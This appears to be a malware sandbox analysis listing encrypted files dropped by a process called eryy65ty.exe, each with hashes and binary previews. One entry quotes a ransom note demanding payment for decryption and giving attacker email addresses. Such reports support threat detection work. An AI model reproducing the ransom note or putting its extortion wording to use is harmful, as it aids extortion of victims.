                                                                                                                                              Preview:....o.0*d-.GVIk.....t..].SDh{...J..S%E...P..hR.C..0L.m}V.\.....".....xy...~.....!...o)]._..b$.m..@(...,.......7..[.r/U...G./..*....%7....O..D.A......!....(.s..E...n.@n..'|.4....'S......}.1......c....x.....;....c?.#.....k.X..}.vZ..0.L.......Sr...0"Z..w:..Z.w.z...l]..........v...\q..\%.n..}?.|P^..U.F.?}ygHl.fZ.f.D.$D..Q....]..5m{.J..U....)~.gn..,(i.to..~.{.0....uZy.8y..`T..b.a.K.A....PK.d.......X..=..M.:.R...O'...u(.6.p[e...D...,.w..Ox.wIQr.,.+.....-*.\.4O..:...- ..~F.`.5.HM.....b;.I2<..$q.....W.^.;.<..c."...H.1jf(...t.'"..F+x.m=..l..'Q{...p..3.......`\.%}S....!L....}.......{..ve.o>Ys./...n.(...b....qFn...1/...w..N..(...B`%.;..1l.tL........,.~.b.Nr}./.?....No.kP0..2..X..U/}G..Ab.gGX-YnF....f...;;......xF..A.f...b.).e......8.......9.._..c9..B;..p.%e..K..\:..AD.Wh...I.;:{L..~......v..7...Z......[z[.Q_....a...}w.#.d.,.=....g....0......#.....8;..b...O..V/...c*.|W..#-.tY.)...j.cYs.27.pD....J....UT..O>T....W....#..)%....vL...C.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.848929330871471
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:PaM8j4BhLFEaUf+I7C9VD9Rmpv2pGRK/TSGtsglU8vcx5chF/47qTb+S8VqmHPOm:PpvhLFEaUybqpv2p0K/TltsglZQaEuhG
                                                                                                                                              MD5:A7047193C1166E46700097FD0D681D8B
                                                                                                                                              SHA1:8B3834FC68C6DF33EE478A0F96B8CF7FCF47D603
                                                                                                                                              SHA-256:7DB5D86FFCBDE73D5CFD35A0344D7E80B4D5B21BF6F23A20D98259F8A37F78D1
                                                                                                                                              SHA-512:F12EF4E819F94FC91C22399E1BF81181FCE0CABBF233752152F5A478B815E5CEB912D9AECE47C6925E804EFD28F6781B8CB43CBBCA73B06E84459EA8F526068F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:u..v..S.?5...T......W.(.~......V.=..8..\77.^m..........`..4..yfN......6_....q.!.)|g.?.P.o_I.H.R9:V...u'R.].>..Dg..kt..l.I.Mo...P..b..4.A..x.nD..H.Si..5.Om..I...."({.F.y....wM\..p..;7h-B.o.Nz..x.....>........G.w..&..xR...~W.$.q..l.....}..OFV..|4..zS]<....c.D5q.....pj}C.y.\..}f..v.fJ...R|00r..{Ac......&..P.7n.9.bs....;...C...U...B....Db..}...Z..p.k.Y......./.TLk...V9..../B.1.._Y..MQz.'.#.J....J..-...........*..... .v.....2..-2.|...C...40m.b.$.f%+y<.+Z.$"~:..p....(...V. 3.9....{.f...4...5f.56....h>.,.$A..?.b~;....Su..3..K....Q.H..{tb..C6...B........WOh.5<.#C.Z.!....>...m..P92..}."...C...5..F"u...X.YD*.x.~.5...|.C>.2.r..G....iM~K.D.......%@.._.Z.R..yJ].Da{H..spw...m......&.5My?N.M..91v..&)..O2...j..L......9`...l..B.Z.)....&....c...}.k.Je.`.!&Q...kBM.s..^.D."....."."..Y3..p..7.@..$M. ..\RKbP...-+.8.ZVp.;q...Q...n..T%=5).....G..n....m8..P.P.P9.}.......6b...xj..a.h.u{).`...+..03.GH.I..r........H{..oF^X.J.uG.n=p..N/[.S........v....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.848929330871471
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:PaM8j4BhLFEaUf+I7C9VD9Rmpv2pGRK/TSGtsglU8vcx5chF/47qTb+S8VqmHPOm:PpvhLFEaUybqpv2p0K/TltsglZQaEuhG
                                                                                                                                              MD5:A7047193C1166E46700097FD0D681D8B
                                                                                                                                              SHA1:8B3834FC68C6DF33EE478A0F96B8CF7FCF47D603
                                                                                                                                              SHA-256:7DB5D86FFCBDE73D5CFD35A0344D7E80B4D5B21BF6F23A20D98259F8A37F78D1
                                                                                                                                              SHA-512:F12EF4E819F94FC91C22399E1BF81181FCE0CABBF233752152F5A478B815E5CEB912D9AECE47C6925E804EFD28F6781B8CB43CBBCA73B06E84459EA8F526068F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:u..v..S.?5...T......W.(.~......V.=..8..\77.^m..........`..4..yfN......6_....q.!.)|g.?.P.o_I.H.R9:V...u'R.].>..Dg..kt..l.I.Mo...P..b..4.A..x.nD..H.Si..5.Om..I...."({.F.y....wM\..p..;7h-B.o.Nz..x.....>........G.w..&..xR...~W.$.q..l.....}..OFV..|4..zS]<....c.D5q.....pj}C.y.\..}f..v.fJ...R|00r..{Ac......&..P.7n.9.bs....;...C...U...B....Db..}...Z..p.k.Y......./.TLk...V9..../B.1.._Y..MQz.'.#.J....J..-...........*..... .v.....2..-2.|...C...40m.b.$.f%+y<.+Z.$"~:..p....(...V. 3.9....{.f...4...5f.56....h>.,.$A..?.b~;....Su..3..K....Q.H..{tb..C6...B........WOh.5<.#C.Z.!....>...m..P92..}."...C...5..F"u...X.YD*.x.~.5...|.C>.2.r..G....iM~K.D.......%@.._.Z.R..yJ].Da{H..spw...m......&.5My?N.M..91v..&)..O2...j..L......9`...l..B.Z.)....&....c...}.k.Je.`.!&Q...kBM.s..^.D."....."."..Y3..p..7.@..$M. ..\RKbP...-+.8.ZVp.;q...Q...n..T%=5).....G..n....m8..P.P.P9.}.......6b...xj..a.h.u{).`...+..03.GH.I..r........H{..oF^X.J.uG.n=p..N/[.S........v....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8209336652548185
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:jxGCm+TEzIFV9ugxPpvtlII2I9JfxnEysJa2Jq02r8QjlzAhtSPEzK:jx1F/z9FlIK9JfxnVsJ332hzASgK
                                                                                                                                              MD5:5BEF3393FFF3229D21489D0545B0C6AC
                                                                                                                                              SHA1:05CCD947CCA1F7D1DC446F7AAA7CDB3BB0294DE6
                                                                                                                                              SHA-256:C6E33AE69991AD0F6587EF440B7755764BCF6DD6FB8807FFB170B714F0BBCE43
                                                                                                                                              SHA-512:2F5577C009B3F13AC8FC4D50C5B4FF083C62AD9B444184343791A602EB80F8BC9D9BC66FB9F8B6790B358F676F58AFBBBAFF89FFB04EDE3343ADAFBDDD51EE9B
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:..0...e...3%.HBIV.t.t+.y....#=o..8.Hq...%.8J.%%t.By......_.7nt{G..(......~.\..2.y.@...@.'.`E..8..T.q.3.t.1..6U`.2.'N....a.s.7..r..t...!E+..RK.A...4............^.....Ci.`.>@F......m.`L.!.............%........C......XT....w...R$..=z.>...@...i..86....d..`..Q+...+..G".s......Y......$3...+..C....2.7.H;..../Hd..=:.,..t].I..3....;?l/,.w..^zi.i....b...?...3.].T.B\J...e.)]nl..k..%.O2.u...|.;...0R.<..rAd........Z.D..`<.1fd!~)l........X..l.d..]....N........d..2..?....`5EL..C....."..F...Y2L.bSUb..pe.O|.k...E. .75.;...Y.N|...\.Z.a.Q.%.......".=...^!3|.O{....j.9.1..#+!...<.^..Z.l..).....+.QRJ..<M.4G.B.o5ZFEu...$;..."..V....z......a].M.Fc4.=.....=f.........NC.D..A{ ..;E.c3.@A;....q...........K9..Y.-.f..Tw.5..,6..V7,...6..CH}.......#.hf.V...T....jA^L.....O....5..]..I,<....w.xA.r......T..Y{.FvV.w).....Z,K.u[3.....k.MxJ+..V1q.tZ.....G*..Pw[..H....B..,.L.s.f.....u........f0.{j.....=sM..m.4U...?.'.h.s.X......_.p......_..:.$6......f...;........{...x;.....B|...h
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8209336652548185
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:jxGCm+TEzIFV9ugxPpvtlII2I9JfxnEysJa2Jq02r8QjlzAhtSPEzK:jx1F/z9FlIK9JfxnVsJ332hzASgK
                                                                                                                                              MD5:5BEF3393FFF3229D21489D0545B0C6AC
                                                                                                                                              SHA1:05CCD947CCA1F7D1DC446F7AAA7CDB3BB0294DE6
                                                                                                                                              SHA-256:C6E33AE69991AD0F6587EF440B7755764BCF6DD6FB8807FFB170B714F0BBCE43
                                                                                                                                              SHA-512:2F5577C009B3F13AC8FC4D50C5B4FF083C62AD9B444184343791A602EB80F8BC9D9BC66FB9F8B6790B358F676F58AFBBBAFF89FFB04EDE3343ADAFBDDD51EE9B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..0...e...3%.HBIV.t.t+.y....#=o..8.Hq...%.8J.%%t.By......_.7nt{G..(......~.\..2.y.@...@.'.`E..8..T.q.3.t.1..6U`.2.'N....a.s.7..r..t...!E+..RK.A...4............^.....Ci.`.>@F......m.`L.!.............%........C......XT....w...R$..=z.>...@...i..86....d..`..Q+...+..G".s......Y......$3...+..C....2.7.H;..../Hd..=:.,..t].I..3....;?l/,.w..^zi.i....b...?...3.].T.B\J...e.)]nl..k..%.O2.u...|.;...0R.<..rAd........Z.D..`<.1fd!~)l........X..l.d..]....N........d..2..?....`5EL..C....."..F...Y2L.bSUb..pe.O|.k...E. .75.;...Y.N|...\.Z.a.Q.%.......".=...^!3|.O{....j.9.1..#+!...<.^..Z.l..).....+.QRJ..<M.4G.B.o5ZFEu...$;..."..V....z......a].M.Fc4.=.....=f.........NC.D..A{ ..;E.c3.@A;....q...........K9..Y.-.f..Tw.5..,6..V7,...6..CH}.......#.hf.V...T....jA^L.....O....5..]..I,<....w.xA.r......T..Y{.FvV.w).....Z,K.u[3.....k.MxJ+..V1q.tZ.....G*..Pw[..H....B..,.L.s.f.....u........f0.{j.....=sM..m.4U...?.'.h.s.X......_.p......_..:.$6......f...;........{...x;.....B|...h
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.851595533369001
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Jg4/ZK3hgthOZShGBgf5R0tHwt3U74ZxDmLhh38EPymqeYEgzfUtZpj:64/Lr6Shb0tF76xqLhh38EPTdgr2Zl
                                                                                                                                              MD5:1E476758049EA462F3A5DD854981CC2F
                                                                                                                                              SHA1:143D84C07262F9941E8D65BDD3D16EE5E1D5C06B
                                                                                                                                              SHA-256:D4DA90AFBDAF4C9BEDF2E7953B4F1F7689262C840E0529927721A3851C9EC460
                                                                                                                                              SHA-512:6B04602FA69435758A4964AA1F13FD5CFD1D58FF3DC4CF7BD5260FF9752ACD0DDB0B9743E1C789A3B3771C0E17B1339240CCC0C7B3DEEAB3DB1100761562B236
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:t'a.Q$?V{AI.f.1....3!ml..,.t....rP..x..d...FL.$3..^...*h...;5...k.L..O.M|..vL"..O(.....9.YGW......E.1.|.]>.n:....u...2D/T...m....C.l.`4mhF...$M..\...........s..Py....F.>.h..o..X...d.._.'.r.^.....Q.>...Gs+......2...%}.KJ......a.J.,6*R]6..h..Q..f@.....;.x. ....w.g@...7../*O...2.^.........cH@ j..]...t.*.sZ_.3(..ru..AI..Jn..y@<.w..g:.vX?,......jQ.sf..M;6.W.w..........6..V~$.pp..!u...2....Y.)P...edw)@>**......U$..H......g.-V.:...^~m.....".l:..S.kR.b..0..n...&...$.c.....T.t..r.'.C.-1.j..$.{....>...d1o.....[PD..5....vTv.......gr|..?.Hy../..9y..|U..t#.y|..y....?D..CL..m.M.......'Fm....@.:m.....X..~)......*..&&B5..z.=.\.`.a...fu??...+0.O.._..2...DHR&.5..g./<....?I a^.....0...B..L.&..Q.i..x.fM4.qI.a.....Yr."..a..(S[......_.Y..."F|.3l.Q....k...r.....H_.[..8.{[....."M.Y...$....;AB.X]K.z21.f.Y..M..{..[..L..~..i...w....J..[.6|.....H~..@y_...@.A.u.W...X9T...._.....]&.'...u.q..X6FcJA.5f..h.2<...ofag...c...K.a^8..6....}.......Q..=y.&y...f...7pF..\.}s
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.851595533369001
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Jg4/ZK3hgthOZShGBgf5R0tHwt3U74ZxDmLhh38EPymqeYEgzfUtZpj:64/Lr6Shb0tF76xqLhh38EPTdgr2Zl
                                                                                                                                              MD5:1E476758049EA462F3A5DD854981CC2F
                                                                                                                                              SHA1:143D84C07262F9941E8D65BDD3D16EE5E1D5C06B
                                                                                                                                              SHA-256:D4DA90AFBDAF4C9BEDF2E7953B4F1F7689262C840E0529927721A3851C9EC460
                                                                                                                                              SHA-512:6B04602FA69435758A4964AA1F13FD5CFD1D58FF3DC4CF7BD5260FF9752ACD0DDB0B9743E1C789A3B3771C0E17B1339240CCC0C7B3DEEAB3DB1100761562B236
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:t'a.Q$?V{AI.f.1....3!ml..,.t....rP..x..d...FL.$3..^...*h...;5...k.L..O.M|..vL"..O(.....9.YGW......E.1.|.]>.n:....u...2D/T...m....C.l.`4mhF...$M..\...........s..Py....F.>.h..o..X...d.._.'.r.^.....Q.>...Gs+......2...%}.KJ......a.J.,6*R]6..h..Q..f@.....;.x. ....w.g@...7../*O...2.^.........cH@ j..]...t.*.sZ_.3(..ru..AI..Jn..y@<.w..g:.vX?,......jQ.sf..M;6.W.w..........6..V~$.pp..!u...2....Y.)P...edw)@>**......U$..H......g.-V.:...^~m.....".l:..S.kR.b..0..n...&...$.c.....T.t..r.'.C.-1.j..$.{....>...d1o.....[PD..5....vTv.......gr|..?.Hy../..9y..|U..t#.y|..y....?D..CL..m.M.......'Fm....@.:m.....X..~)......*..&&B5..z.=.\.`.a...fu??...+0.O.._..2...DHR&.5..g./<....?I a^.....0...B..L.&..Q.i..x.fM4.qI.a.....Yr."..a..(S[......_.Y..."F|.3l.Q....k...r.....H_.[..8.{[....."M.Y...$....;AB.X]K.z21.f.Y..M..{..[..L..~..i...w....J..[.6|.....H~..@y_...@.A.u.W...X9T...._.....]&.'...u.q..X6FcJA.5f..h.2<...ofag...c...K.a^8..6....}.......Q..=y.&y...f...7pF..\.}s
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.854514841303899
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:H7gDj0VY0/vk7X36AxgJnfkUEglBhBb6B1TKsaUe6fv53w:c3qNvkrAnfkUP+BIzUe63S
                                                                                                                                              MD5:2752C6CA9C40EA5D1E208E1513346EB5
                                                                                                                                              SHA1:A14F8D3994BF5A087E73ED721CF067830FBEE3E0
                                                                                                                                              SHA-256:222A972A8EDDA26A429A7A59D8AF0A568F1575F0F5F8A6BC0E2E054E7F6A51B3
                                                                                                                                              SHA-512:9FE729BE5867C414C413654D3409C7445FF7A22C0EFA79F0AD0D6040D0AFEC13B0CB3AC4C5E6742148495BB81C4AA48F43A450E8F0C0F1B16930F5F5D61B1C9C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:e.!(.....si.uN.&.i;.>!..O..........^c4.%.....(.....8'..[..&m.\.Z8..-..s..08.[|;....'6.......1..y'.........*............z.....i.~.x..Ak...j.}.4..{...~.C.3d2.....P..A.....U.u..$..i.Qy.q[.uP..X.......=.1.....u5.rA.......0.J.....=.....U.H$.6.-.h..E...\7.....s..3..q.V.kp..}..k.x..4.h.>..t...^b..fz.....1V....pY.s.."..Ge.Y.a+cG.......o....5.J|.O...y....*rd...V.........K/.....qb.K.v..1.#..#OR...f....[...l.....Hd........L.b...!T.d...fz.[.r.i.X..@.4._..+u..n9....1....'.-.bG.`.;..)....}>.......4..q.R..h..[...m...z$M..}..G+.K)...XAe....>..(.8p.. V..{.p ..4...~G]po.#.%~..T ....i.......xjk;RQ..+..YaS.#:....7...0.?.....A.{.>....&..A....B$.ls.Y...1..j.c......;.l...`.S..........9..j7.]F..Euq3OYG.-FM,?...(i{(...eZ.Z.;.C/..8.5L1..8.....~/].GTH$}.*>....s....2(..P.....].AL.d. '.|&@..%.Zxv*..]......*..uU.t6v.&.r.T=.b\.,....1.Y.h.:x).yf.f..,.CH.. B.W...H.?g8...g'j.1..f}......,_...D.....ML........V...Rq...R...P.Sw.g.`.l[..Z.y.x..V.i.`.x@...&g....#.a..............
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.854514841303899
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:H7gDj0VY0/vk7X36AxgJnfkUEglBhBb6B1TKsaUe6fv53w:c3qNvkrAnfkUP+BIzUe63S
                                                                                                                                              MD5:2752C6CA9C40EA5D1E208E1513346EB5
                                                                                                                                              SHA1:A14F8D3994BF5A087E73ED721CF067830FBEE3E0
                                                                                                                                              SHA-256:222A972A8EDDA26A429A7A59D8AF0A568F1575F0F5F8A6BC0E2E054E7F6A51B3
                                                                                                                                              SHA-512:9FE729BE5867C414C413654D3409C7445FF7A22C0EFA79F0AD0D6040D0AFEC13B0CB3AC4C5E6742148495BB81C4AA48F43A450E8F0C0F1B16930F5F5D61B1C9C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:e.!(.....si.uN.&.i;.>!..O..........^c4.%.....(.....8'..[..&m.\.Z8..-..s..08.[|;....'6.......1..y'.........*............z.....i.~.x..Ak...j.}.4..{...~.C.3d2.....P..A.....U.u..$..i.Qy.q[.uP..X.......=.1.....u5.rA.......0.J.....=.....U.H$.6.-.h..E...\7.....s..3..q.V.kp..}..k.x..4.h.>..t...^b..fz.....1V....pY.s.."..Ge.Y.a+cG.......o....5.J|.O...y....*rd...V.........K/.....qb.K.v..1.#..#OR...f....[...l.....Hd........L.b...!T.d...fz.[.r.i.X..@.4._..+u..n9....1....'.-.bG.`.;..)....}>.......4..q.R..h..[...m...z$M..}..G+.K)...XAe....>..(.8p.. V..{.p ..4...~G]po.#.%~..T ....i.......xjk;RQ..+..YaS.#:....7...0.?.....A.{.>....&..A....B$.ls.Y...1..j.c......;.l...`.S..........9..j7.]F..Euq3OYG.-FM,?...(i{(...eZ.Z.;.C/..8.5L1..8.....~/].GTH$}.*>....s....2(..P.....].AL.d. '.|&@..%.Zxv*..]......*..uU.t6v.&.r.T=.b\.,....1.Y.h.:x).yf.f..,.CH.. B.W...H.?g8...g'j.1..f}......,_...D.....ML........V...Rq...R...P.Sw.g.`.l[..Z.y.x..V.i.`.x@...&g....#.a..............
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.846779225950641
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:GH34DstM6mwjSF/zYhrE7ylKhGIu4Ya/VqliFz2oFZcgcyXfeS:0ttM6HA7yN/da/sIDx2S
                                                                                                                                              MD5:E9F62E63C31CAC0B79A9A12D99C7A340
                                                                                                                                              SHA1:E249CB173ACCA41D06FB0F853FB43FF0EDABA42A
                                                                                                                                              SHA-256:64B50A7AA5B2DBB72E00EC5B5805960928672560A927CA199EA2E4E2FD6B48F7
                                                                                                                                              SHA-512:7035421EC59A0B7A8903CA758727B75871FCCE84B2FC895052B1C7753E276AF472E49B71944CE4BC33CE3F701D31D5E1E3AC447A543E32B55B06DE949CF5A88F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...?.xa...=m.9(2&....Y.n0..Y.&..k..v....!...Q...l.. LI.~..Q..|..00...|.....:..r..1.....p.AHLz...(.1...*N.M..L.O..}f-.u@........I.....d.X.v..47.......p. .q..L).rOg.{.......8_.;Z.....&jR.S#3O./.....54.e...&.H..]...........;..f...-.%..m...H4...\.:.F....D.=k..t..(48.T...s.v.....@Y.(.J8.yQ8..b..N._...0W.tn..SO.^...{iKo.....C.....@..9n.........xI..G".l...}.....o.c..x(g..+}...z...x......kI...Bz.O.....!..\.^..%..W.~k67.n.>.x3j..J........e...,<..O..0....sRaB.#.. ...8.U.ua......8....$..F..C..\..T}.Y.#@.........n...J.>4..R...>.e..k...+............I.Y...~..9..k...i8Wk.t{..:@.H...P.....9_...:C.u.v.d.t.F2&.K`...y....[..Y....S.S.:!@..s...4...dU.t......f....ES.o...P.].i..F...H....=#.CJTht....|.JF.B.X.j.....ZX...5p..a.O..rl.Xx.....UF^.5..C..!3..A>.!.i.......U.{..n.p...LE.t.....uy....~.........6..q..O..1....$.J2.u.^2|.#.-.L...0.~.sT.^.qM5...t......r.(.u..6..O2.=9./..R.$......Sj9..!2F<.6.o...-..!....&.?5.IQZ...K.d...5.})J..K.?:.c.H<'.K.H.va....W..mh.J..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.846779225950641
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:GH34DstM6mwjSF/zYhrE7ylKhGIu4Ya/VqliFz2oFZcgcyXfeS:0ttM6HA7yN/da/sIDx2S
                                                                                                                                              MD5:E9F62E63C31CAC0B79A9A12D99C7A340
                                                                                                                                              SHA1:E249CB173ACCA41D06FB0F853FB43FF0EDABA42A
                                                                                                                                              SHA-256:64B50A7AA5B2DBB72E00EC5B5805960928672560A927CA199EA2E4E2FD6B48F7
                                                                                                                                              SHA-512:7035421EC59A0B7A8903CA758727B75871FCCE84B2FC895052B1C7753E276AF472E49B71944CE4BC33CE3F701D31D5E1E3AC447A543E32B55B06DE949CF5A88F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...?.xa...=m.9(2&....Y.n0..Y.&..k..v....!...Q...l.. LI.~..Q..|..00...|.....:..r..1.....p.AHLz...(.1...*N.M..L.O..}f-.u@........I.....d.X.v..47.......p. .q..L).rOg.{.......8_.;Z.....&jR.S#3O./.....54.e...&.H..]...........;..f...-.%..m...H4...\.:.F....D.=k..t..(48.T...s.v.....@Y.(.J8.yQ8..b..N._...0W.tn..SO.^...{iKo.....C.....@..9n.........xI..G".l...}.....o.c..x(g..+}...z...x......kI...Bz.O.....!..\.^..%..W.~k67.n.>.x3j..J........e...,<..O..0....sRaB.#.. ...8.U.ua......8....$..F..C..\..T}.Y.#@.........n...J.>4..R...>.e..k...+............I.Y...~..9..k...i8Wk.t{..:@.H...P.....9_...:C.u.v.d.t.F2&.K`...y....[..Y....S.S.:!@..s...4...dU.t......f....ES.o...P.].i..F...H....=#.CJTht....|.JF.B.X.j.....ZX...5p..a.O..rl.Xx.....UF^.5..C..!3..A>.!.i.......U.{..n.p...LE.t.....uy....~.........6..q..O..1....$.J2.u.^2|.#.-.L...0.~.sT.^.qM5...t......r.(.u..6..O2.=9./..R.$......Sj9..!2F<.6.o...-..!....&.?5.IQZ...K.d...5.})J..K.?:.c.H<'.K.H.va....W..mh.J..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.871292483916367
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:iL1hQ18ravGKGeaIeJPQkr2MJXyFAlypDQjS4HP8LTmUOtc3lSDPk:i81XGeyJYkBiFBpsX8LTzOtcUPk
                                                                                                                                              MD5:E7A4DE6E121562EC7316A96B227B0365
                                                                                                                                              SHA1:A33201E51C0D790714763211A73BC0986D518AD3
                                                                                                                                              SHA-256:1C050C9327751B669589739D40A613C8B8E2A12A7D1819F10438733C7427F17F
                                                                                                                                              SHA-512:0F00D901B2C833AD81C6A5D4506EACB7A6429513D0A59CF37B5249CDA071A64B792282D3E27C86133B2C82FFC9E65792FF867A7B2B83F12D58E9C33B3BA57EE0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..H.=ue..4.O...z..2....... `.4..H~M.Ba.L..{.7.j.C.....Z..[...o..{......=.j.r.6...^Zc+s.k.Y`ic..IZW..i..&..;.........7?..d.5......P./.. .l9..Y...g.5L.>.e.93^.J.jj...M.....u...lR}N|p....+l.#..l...N.=8K.q5K*.rL...$..M.l...}|..a<(...@.0...F:5,!...|.1".........B.*.l...0....Z.I.*.7...h]^TV.o.5..F...Y..A. ......~.]...[....2s....4!..)q-.i...........6..S1..&..l1.@..*.....BRSvU../.@]ea.vc.......,....wU.Hl...%[.;....T.z....^.(....B_7*..y..C{4t...^..*........1+-@-.C..5.......g..K.(.p..3.Lk....G'.#.......L.U.wl_i........>i.6.wM+...V.|..D..*.......wN.Si..4..(..G>..zv....1.f.f].7..r$..C)i...T.H...c.R.t7....2.M.y...)..V.x.!.|x....u.o..*y~........V.....N.c......aaNH2w..k....d).....]..|.Z...h.#.#r\y.8W.....jlf.....:......G..8..m.8.C&.S..5..]...P8Ol......d.T...{[K29..y.....Z..Y..}...2ojV....Uu..O..aA.f.....u@.V...I._.Q/.[.<p..^...@.....h2.!s.^ADM.E60.O..`kP.Vy...DvO....9.nQu.T?..h.7EQ...H...Z.....Y.q...=..5...K.4.x.o..pv..1.}...?UN...%j.$..o...$L]1.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.871292483916367
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:iL1hQ18ravGKGeaIeJPQkr2MJXyFAlypDQjS4HP8LTmUOtc3lSDPk:i81XGeyJYkBiFBpsX8LTzOtcUPk
                                                                                                                                              MD5:E7A4DE6E121562EC7316A96B227B0365
                                                                                                                                              SHA1:A33201E51C0D790714763211A73BC0986D518AD3
                                                                                                                                              SHA-256:1C050C9327751B669589739D40A613C8B8E2A12A7D1819F10438733C7427F17F
                                                                                                                                              SHA-512:0F00D901B2C833AD81C6A5D4506EACB7A6429513D0A59CF37B5249CDA071A64B792282D3E27C86133B2C82FFC9E65792FF867A7B2B83F12D58E9C33B3BA57EE0
                                                                                                                                              Malicious:false
